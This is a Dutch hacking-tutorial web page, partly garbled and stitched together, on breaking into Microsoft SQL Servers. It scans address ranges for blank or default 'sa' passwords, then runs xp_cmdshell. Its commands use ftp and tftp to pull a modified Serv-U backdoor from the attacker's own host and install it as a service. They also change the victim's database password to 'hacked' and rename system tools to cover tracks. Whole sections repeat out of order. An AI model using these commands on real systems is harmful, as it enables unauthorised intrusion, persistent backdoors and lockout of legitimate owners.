HACKEN VAN WHATSAPP, FACEBOOK, TWITTER ACCOUNTS WACHTWOORD HACKEN SKYPE LIVE.COM

Home > Tutorials > Hacking > Sql database hacken

Sql database hacken

SQL Database hacken
Benodigdheden :

-SQLexec: http://www.sunx.org/mysoft/SqlExec.exe
-ScanSql: http://www.chinesehack.org/down/show.asp?id=2636&down=1
-Of: http://home.hccnet.nl/m3ssi4h.rul3z/

Deel 1: Scannen
Deel 2: Hacken
Deel 3: Beschermen
Deel 4: Problemen oplossen

--------------------------------------------------------------

Deel 1 - Scannen

Local Scanning:
Open CMD
Ga naar de map waar scansql.exe in zit.
Typ deze command in.

ScanSql xxx.xxx.x.x xxx.xxx.xxx.xxx 200

Screenshot:

Remote Scanning:
Je hebt een hacked stro nodig
Connect erna met FlashFXP.
Upload ScanSql.exe en sqlpass.dic.
Klik op RAW commands en typ:

site exec ScanSql xxx.xxx.x.x xxx.xxx.xxx.xxx 200

Screenshot:

De resultaten worden gesaved in results.txt

---------------------------------------------------------------

Deel 2 - Hacken
Eerst neem een scan:

-------------------------------------------------
192.168.0.1 sa/[blank password]
192.168.0.2 sa/[blank password]
192.168.0.3 admin/[blank password]
192.168.0.4 sa/sa
192.168.0.5 admin/admin
192.168.0.6 sa/password
192.168.0.7 admin/admin
-------------------------------------------------
Kies er 1 uit.
Open SQLexec en vul het ip en user/pass in en connect..
Als je bent geconnect word de Connect knop grijs.

Screenshot:

Typ "dir c:" Om te zien hoeveel plaats er nog vrij is.

Als dat genoeg is typ je "dir *ServUStartUpLog* s" om de file te zoeken.
Als je deze kan vinden, is de ftp al gehacked.
Als ie nog niet gehacked is typ deze commands in om een script te maken voor het uploaden van de files.

echo open > c:WINNTSystem32script.txt
echo user >> c:WINNTSystem32script.txt
echo >> c:WINNTSystem32script.txt
echo lcd dir_where_to_upload_files >> c:WINNTSystem32script.txt
echo cd /dir_with_the_serv-u_files/ >> c:WINNTSystem32script.txt
echo get ServUDaemon.exe >> c:WINNTSystem32script.txt
echo get ServUDaemon.ini >> c:WINNTSystem32script.txt
echo get Serv-U.cnt >> c:WINNTSystem32script.txt
echo get BugSlayerUtil.dll >> c:WINNTSystem32script.txt
echo get Serv-UID.old >> c:WINNTSystem32script.txt
echo get TzoLibr.dll >> c:WINNTSystem32script.txt
echo get libeay32.dll >> c:WINNTSystem32script.txt
echo get ssleay32.dll >> c:WINNTSystem32script.txt
echo bye >> c:WINNTSystem32script.txt

Nu heb je een script gemaakt voor ftp.exe. ftp.exe word geupload in de c:WINNTsystem32.
Ga nu naar de map c:WINNTsystem32.
Om ftp.exe te uploaden typ deze commends in.

ftp -n -s:WINNTsystem32script.txt

Screenshot:

Nu freezed het programma voor een tijdje
Daarna zijn de programma’s geupload.
Typ nu deze command in om ServUDaemon te installeren:

c:[dir_with_ServUDaemon]ServUDaemon.exe /i

Screenshot:

Nu ServUDaemon geinstalleerd is.
Maar om de serv-u ftp server te starten moet je deze command intypen:

c:net start serv-u

Screenshot:

Je krijgt nu een bericht of Serv-U is gestart of niet.
Zo niet ga naar Deel 4: Problemen oplossen.

----------------------------------------------------------------

Deel 3 - Protecting

Changing the SQL-server pass:
Verander de extencie met SQLexec naar "%s".

Typ deze command

sp_password password, 'new_password', 'username'

pasword: Het huidige SQL password, NULL is [blank password]
username: Het huidige SQL username.
new_password: Hier je nieuwe paswoord.

Voorbeeld:

sp_password NULL, 'hacked', 'sa'

Maar als de FTP SQL-services gebruikt zal deze zich afsluiten en zal je snel gepakt zijn L!

Hernoem ftp.exe en tftp.exe:
Met de volgende commands hernoem je ftp.exe en tftp.exe:

cd winntsystem32
move ftp.exe sqlupdate.exe
move tftp.exe directsql.exe
del c:ftp.exe /s
del c:tftp.exe /s

Screenshot:

Vul ze allemaal in 1 voor een zoals in de bovenstaande screenshot.

Nu ftp.exe = sqlupdate.exe
en tftp.exe = directsql.exe

Ja kan ook andere namen verzinnen maar ik heb voor sqlupdate en directsql gekozen.

--------------------------------------------------------------

Deel 4 - Problemen oplossen

Wil Serv-U niet starten:
Try this command to install the ServUDaemon.exe again.

c:/[dir_met_ServUDaemon]/ServUDaemon.exe /i c:/[dir_met_ServUDaemon]/ServUDaemon.ini

Daarna typ je "net start serv-u".

Deze tutorial gaat over het hacken van beveiligde sql servers..

Benodigheden:
1) OSQL.exe Download hier: OSQL.exe
2) ERVARING MET HET HACKEN VAN NORMALE SQL SERVER!
Hacken: Maak in de dir van OSQL.exe een .txt bestandje dat je restore.txt (restore omdat: restore xp_cmdshell) noemd. Zet dit in het bestandje:
quote:
--------------------------------------------------------------------------------
use master exec sp_addextendedproc 'xp_cmdshell', 'C:/Program Files/Microsoft SQL Server/MSSQL/Binn/xplog70.dll' go
--------------------------------------------------------------------------------
We zijn zover om de sqlserver van het vresenlijke SQL_error juk te bevrijden (hopenlijk)!!!. Start een DOS vernster en cd naar de dir waar je osql in hebt staan. TYP dan: osql.exe -S 123.123.123.123 -U sa -P "SQLPASSWOORDHIER" -i restore.txt Laat de " staan! Als er geen passwoord is laat je simpelweg geen spatie zien zoals hier: -U sa -P "" -i restore.txt Als alles goed ging zie je iets wat hier op lijkt:
quote:
--------------------------------------------------------------------------------
1> 2> 3> 1>
--------------------------------------------------------------------------------
Als je pech hebt (Dan is de SQL_server ECHT secure) Zie je dit:
quote:
--------------------------------------------------------------------------------
[Microsoft][ODBC SQL Server Driver][SQL Server]There is already an object named 'xp_cmdshell' in the database.
--------------------------------------------------------------------------------
Nu connect je naar het IP via sqlexec En er is geen SQL_error meer te bekennen. Credits gaan naar

SQL Hacking TFTP versie

Benodigheden:

Een tftp server: (dus GEEN ftp server):
SQLexec.exe
Modded serv-u
1 Procent intelligentie
SQL scannes

OK:

Start de TFP server klik op file dan op configure. ga naar het tablad "security" en zet hem op "transmit and receive files". Maak ff een dir op je C schijf en noem die ftp zet de serv-u files daarin (ServuDaemon.exe Servudaemon.ini en tzolibr.dll). Ga nu weer terug naar TFP server en naar configure. Ga nu naar het tablad "tfp root directory" en zet die op C:ftp. klik nu op OK en minimaliseer tftp

Hacking:

start SQLexec.exe vul de ftp pass en ip in en press connect. typ dan regel voor regel in verander**.*.**.***in jouw eigen IP:

tftp -i **.*.**.*** get ServUDaemon.ini c:winntSystem32ServUDaemon.ini
tftp -i **.*.**.*** get ServUDaemon.ini c:winntSystem32ServUDaemon.exe
tftp -i **.*.**.*** get ServUDaemon.ini c:winntSystem32Tzolibr.dll
C:winntsystem32ServUDaemon.exe /i
net start serv-u

Deze pagina staat op squareware.tk

Nu heb je een script gemaakt voor ftp.exe. ftp.exe word geupload in de c:WINNTsystem32.
Ga nu naar de map c:WINNTsystem32.
Om ftp.exe te uploaden typ deze commends in.

ftp -n -s:WINNTsystem32script.txt

Screenshot:

Nu freezed het programma voor een tijdje
Daarna zijn de programma�s geupload.
Typ nu deze command in om ServUDaemon te installeren:

c:[dir_with_ServUDaemon]ServUDaemon.exe /i

Screenshot:

Nu ServUDaemon geinstalleerd is.
Maar om de serv-u ftp server te starten moet je deze command intypen:

c:net start serv-u

Screenshot:

Je krijgt nu een bericht of Serv-U is gestart of niet.
Zo niet ga naar Deel 4: Problemen oplossen.

----------------------------------------------------------------

Deel 3 - Protecting

Changing the SQL-server pass:
Verander de extencie met SQLexec naar "%s".

Typ deze command

sp_password password, 'new_password', 'username'

pasword: Het huidige SQL password, NULL is [blank password]
username: Het huidige SQL username.
new_password: Hier je nieuwe paswoord.

Voorbeeld:

sp_password NULL, 'hacked', 'sa'

Maar als de FTP SQL-services gebruikt zal deze zich afsluiten en zal je snel gepakt zijn L!

Hernoem ftp.exe en tftp.exe:
Met de volgende commands hernoem je ftp.exe en tftp.exe:

cd winntsystem32
move ftp.exe sqlupdate.exe
move tftp.exe directsql.exe
del c:ftp.exe /s
del c:tftp.exe /s

Screenshot:

Vul ze allemaal in 1 voor een zoals in de bovenstaande screenshot.

Nu ftp.exe = sqlupdate.exe
en tftp.exe = directsql.exe

Ja kan ook andere namen verzinnen maar ik heb voor sqlupdate en directsql gekozen.

--------------------------------------------------------------

Deel 4 - Problemen oplossen

Wil Serv-U niet starten:
Try this command to install the ServUDaemon.exe again.

c:/[dir_met_ServUDaemon]/ServUDaemon.exe /i c:/[dir_met_ServUDaemon]/ServUDaemon.ini

Daarna typ je "net start serv-u".

SQL Hacking TFTP versie

Deze pagina staat op squareware.tk

Nu freezed het programma voor een tijdje
Daarna zijn de programma�s geupload.
Typ nu deze command in om ServUDaemon te installeren:

c:[dir_with_ServUDaemon]ServUDaemon.exe /i

Screenshot:

Nu ServUDaemon geinstalleerd is.
Maar om de serv-u ftp server te starten moet je deze command intypen:

c:net start serv-u

Screenshot:

SQL Hacking TFTP versie

Benodigheden:

Een tftp server: (dus GEEN ftp server):
SQLexec.exe
Modded serv-u
1 Procent intelligentie
SQL scannes

OK:

Start de TFP server klik op file dan op configure. ga naar het tablad "security" en zet hem op "transmit and receive files". Maak ff een dir op je C schijf en noem die ftp zet de serv-u files daarin (ServuDaemon.exe Servudaemon.ini en tzolibr.dll). Ga nu weer terug naar TFP server en naar configure. Ga nu naar het tablad "tfp root directory" en zet die op C:ftp. klik nu op OK en minimaliseer tftp

Hacking:

start SQLexec.exe vul de ftp pass en ip in en press connect. typ dan regel voor regel in verander**.*.**.***in jouw eigen IP:

tftp -i **.*.**.*** get ServUDaemon.ini c:winntSystem32ServUDaemon.ini
tftp -i **.*.**.*** get ServUDaemon.ini c:winntSystem32ServUDaemon.exe
tftp -i **.*.**.*** get ServUDaemon.ini c:winntSystem32Tzolibr.dll
C:winntsystem32ServUDaemon.exe /i
net start serv-u

http://comsci.liu.edu/~murali/util/Intro.htm << hier kan je de benodigd heden vinden!